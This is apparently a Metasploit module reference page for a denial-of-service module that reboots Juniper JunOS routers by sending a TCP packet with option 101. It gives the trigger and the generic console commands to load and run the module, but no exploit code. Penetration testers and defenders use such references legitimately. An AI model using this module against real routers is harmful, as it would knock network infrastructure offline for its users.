Juniper JunOS Malformed TCP Option

This module exploits a denial of service vulnerability in Juniper Network's JunOS router operating system. By sending a TCP packet with TCP option 101 set, an attacker can cause an affected router to reboot.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use auxiliary/dos/tcp/junos_tcp_opt
msf auxiliary(junos_tcp_opt) > show actions
msf auxiliary(junos_tcp_opt) > set ACTION < action-name >
msf auxiliary(junos_tcp_opt) > show options
    ...show and set options...
msf auxiliary(junos_tcp_opt) > run

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
